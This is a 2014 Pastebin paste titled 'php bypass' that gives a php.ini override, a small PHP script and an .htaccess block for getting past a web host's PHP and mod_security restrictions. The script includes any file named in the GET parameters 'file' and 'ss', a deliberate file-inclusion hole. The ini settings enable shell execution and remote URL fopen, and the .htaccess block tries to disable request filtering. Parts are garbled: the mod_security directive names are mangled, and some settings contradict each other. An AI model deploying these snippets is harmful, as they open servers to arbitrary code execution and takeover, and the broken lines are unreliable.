Pain_R

php bypass

Mar 5th, 2014
372
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.89 KB | None | 0 0
  1. #PHP.INI CODE :
  2.  
  3. safe_mode = OFF
  4. disable_functions = "ln, cat, popen, pclose, posix_getpwuid, posix_getgrgid, posix_kill, parse_perms, system, dl, passthru, exec, shell_exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, pcntl_exec, ini_alter, pfsockopen, leak, apache_child_terminate, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, fpassthru, stream_select, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual, chmod, file_upload, delete, deleted, edit, fwrite, cmd, rename, unlink, mkdir, mv, touch, cp, cd, pico"
  5. safe_mode_gid = OFF
  6. open_basedir = OFF
  7. register_globals = ON
  8. exec = ON
  9. shell_exec = ON
  10. allow_url_fopen = ON
  11. file_uploads = ON
  12. disable_classes =
  13. safe_mode_include_dir =
  14. safe_mode_exec_dir =
  15. safe_mode_gid = OFF
  16. short_open_tag = ON
  17. log_errors = ON
  18. log_errors_max_len = 1024
  19. ignore_repeated_errors = ON
  20. register_globals = OFF
  21. magic_quotes_runtime = OFF
  22. magic_quotes_gpc = ON
  23. AddHandler application/x-httpd-php4 .php
  24. display_errors = OFF
  25.  
  26.  
  27. #INI.PHP CODE :
  28.  
  29. <?
  30. echo ini_get(“safe_mode”);
  31. echo ini_get(“open_basedir”);
  32. include($_GET["file"]);
  33. ini_restore(“safe_mode”);
  34. ini_restore(“open_basedir”);
  35. echo ini_get(“safe_mode”);
  36. echo ini_get(“open_basedir”);
  37. include($_GET["ss"]);
  38. ?>
  39.  
  40.  
  41. #.HTACCESS CODE :
  42.  
  43. <IfModule mod_security.c>
  44. FucKFilterEngine Off
  45. FucKFilterScanPOST Off
  46. FucKFilterCheckURLEncoding Off
  47. FucKFilterCheckUnicodeEncoding Off
  48. </IfModule>
Advertisement
Add Comment
Please, Sign In to add comment